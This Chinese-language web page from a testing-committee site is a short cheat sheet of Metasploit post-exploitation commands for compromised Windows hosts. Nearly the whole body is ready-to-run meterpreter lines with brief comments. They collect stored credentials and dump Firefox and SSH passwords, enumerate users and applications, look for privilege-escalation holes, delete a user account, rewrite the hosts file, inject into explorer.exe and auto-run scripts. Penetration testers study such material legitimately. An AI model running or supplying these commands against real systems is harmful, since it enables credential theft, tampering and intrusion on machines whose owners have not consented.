中国电子商会信息工程测试专业委员会主办
今天是 2024年 12月 09日 星期一
中国电子商会信息工程测试专业委员会
Integrity archives
诚信档案
技术前沿 您的位置:主页 > 诚信档案 > 技术前沿 >
Msf后渗透测试阶段_POST模块
2023-06-02 返回列表

POST模块

run post/windows/gather/arp_scanner RHOSTS=192.168.0.0/24
  #ARP扫描

图片

 

run post/windows/gather/checkvm  #查询目标是不是虚拟机

图片

 

run post/windows/gather/credentials/credential_collector 
  #查看用户信息

 

run post/windows/gather/enum_applications
  #查看安装了哪些应用程序

图片

 

run post/windows/gather/enum_logged_on_users
  #查看目前正在登录的用户

图片

 

run post/windows/gather/enum_snmp
  #查看目标机器的snmp配置

图片

 

run post/multi/recon/local_exploit_suggester 
#查看本地提权漏洞

图片

 

run post/windows/manage/delete_user USERNAME=sbz
  #删除用户账号

图片

 

run post/multi/gather/env
  #查看目标机器环境变量

图片

 

run post/multi/gather/firefox_creds
  #查看目标本机的firefox流量的账号密码
run post/multi/gather/ssh_creds
  #查看本机SSH的账号密码

 

自动执行meterpreter脚本

set AutoRunScript hostsedit -e 1.1.1.1,www.baidu.com  #修改host文件
set InitialAutoRunScript checkvm

自动执行post模块

set initialautorunscript migrate -n explorer.exe #注入进程
set autorunscript post/windows/gather/dumplinks  #查询最近文件

 

 

二维码
中国电子商会信息工程测试专业委员会 电话:010-87660482 传真:010-87660482 邮箱:ceietn@sina.com 地址:北京经济技术开发区博兴六路17号院1号楼3层(100176)
Copyright © 2021-2027 中国电子信息工程与测试网 版权所有 主办单位:中国电子商会信息工程测试专业委员会 技术支持:电设信科(北京)技术有限公司 备案号:京ICP备11002915号-001